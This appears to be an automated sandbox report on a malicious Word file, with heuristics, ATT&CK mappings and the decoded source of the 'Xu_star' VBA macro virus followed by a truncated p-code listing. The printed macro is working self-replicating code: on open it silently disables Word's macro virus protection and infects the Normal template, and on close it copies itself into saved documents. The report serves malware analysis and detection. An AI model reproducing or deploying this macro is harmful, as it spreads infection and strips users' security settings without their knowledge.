Verdict: MALICIOUS
Risk Score: 120

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Document_Open subroutine, which runs automatically when the document is opened and is a common technique for malware delivery. The macro attempts to copy itself into the Normal template, and ClamAV detects the file as 'Doc.Trojan.Xu-1'. Together, the auto-executing Document_Open macro and the ClamAV detection strongly indicate malicious intent to execute further payloads or establish persistence.
Heuristics (3)

- ClamAV: Doc.Trojan.Xu-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Xu-1
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7435 bytes | 5117bb384c839e92bc070da9276bc3f46b029ce637b58c8728976823e3990f25 |

Preview script: first 1,000 lines of the extracted script (decoded VBA source followed by the p-code disassembly emitted by the extractor; the listing is truncated by the analyzer).

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Xu_star macro Virus 1.00
Private Sub Document_Close()
    On Error Resume Next
    Dim ADL As Long, NTL As Long
    Dim FileNM As String
    FileNM = System.Application.Path & "\" & Right(Year(Date), 2) & Month(Date) & Day(Date) & Second(Time) & ".dos"
    Dim FNo As Long
    ADL = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    NTL = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    If ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) = "'Xu_star macro Virus 1.00" Then
        FNo = FreeFile
        Open FileNM For Output As #FNo
        Print #FNo, "Xu_star 1.00a Welcome!"
        Close #FNo
        Exit Sub
    End If
    If ADL > 0 Then ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, LinesCount
    NTL = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    If ActiveDocument.Saved = True Then
        ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.InsertLines NTL, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, NTL)
        Call ActiveDocument.Save
        ActiveDocument.Saved = True
    End If
End Sub
Private Sub Document_Open()
    On Error Resume Next
    Dim ADL As Long, NTL As Long
    Options.VirusProtection = (100 * 0)
    Options.ConfirmConversions = (100 * 0)
    Options.SaveNormalPrompt = (100 * 0)
    ADL = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    NTL = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    'if Normal not Xu_star virus
    'Infect to normalTemplate
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "'Xu_star macro Virus 1.00" Then
        If NTL > 0 Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, LinesCount
        ADL = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
        NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines ADL, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ADL)
    End If
End Sub
' Processing file: /opt/analyzer/scan_staging/3598af458bec40448995f706138a078f.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3714 bytes
' Line #0:
'   QuoteRem 0x0000 0x0019 "Xu_star macro Virus 1.00"
' Line #1:
'   FuncDefn (Private Sub Document_Close())
' Line #2:
'   OnError (Resume Next)
' Line #3:
'   Dim
'   VarDefn ADL (As Long)
'   VarDefn NTL (As Long)
' Line #4:
'   Dim
'   VarDefn FileNM (As String)
' Line #5:
'   Ld System
'   MemLd Application
'   MemLd Path
'   LitStr 0x0001 "\"
'   Concat
'   Ld Date
'   ArgsLd Year 0x0001
'   LitDI2 0x0002
'   ArgsLd Right 0x0002
'   Concat
'   Ld Date
'   ArgsLd Month 0x0001
'   Concat
'   Ld Date
'   ArgsLd Day 0x0001
'   Concat
'   Ld Time
'   ArgsLd Second 0x0001
'   Concat
'   LitStr 0x0004 ".dos"
'   Concat
'   St FileNM
' Line #6:
'   Dim
'   VarDefn FNo (As Long)
' Line #7:
'   LitDI2 0x0001
'   Ld ActiveDocument
'   MemLd VBProject
'   MemLd VBComponents
'   ArgsMemLd Item 0x0001
'   MemLd CodeModule
'   MemLd CountOfLines
'   St ADL
' Line #8:
'   LitDI2 0x0001
'   Ld NormalTemplate
'   MemLd VBProject
'   MemLd VBComponents
'   ArgsMemLd Item 0x0001
'   MemLd CodeModule
'   MemLd CountOfLines
'   St NTL
' Line #9:
' Line #10:
'   LitDI2 0x0001
'   LitDI2 0x0001
'   LitDI2 0x0001
'   Ld ActiveDocument
'   MemLd VBProject
'   MemLd VBComponents
'   ArgsMemLd Item 0x0001
'   MemLd CodeModule
'   ArgsMemLd Lines 0x0002
'   LitStr 0x001A "'Xu_star macro Virus 1.00"
'   Eq
'   IfBlock
' Line #11:
'   Ld Friend
'   St FNo
' Line #12:
'   Ld FileNM
'   Ld FNo
'   Sharp
'   LitDefault
'   Open (For Output)
' Line #13:
'   Ld FNo
'   Sharp
'   PrintChan
'   LitStr 0x0016 "Xu_star 1.00a Welcome!"
'   PrintItemNL
' Line #14:
'   Ld FNo
'   Sharp
'   Close 0x0001
' Line #15:
'   ExitSub
' Line #16:
'   EndIfBlock
' Line #17:
' ... (truncated)
```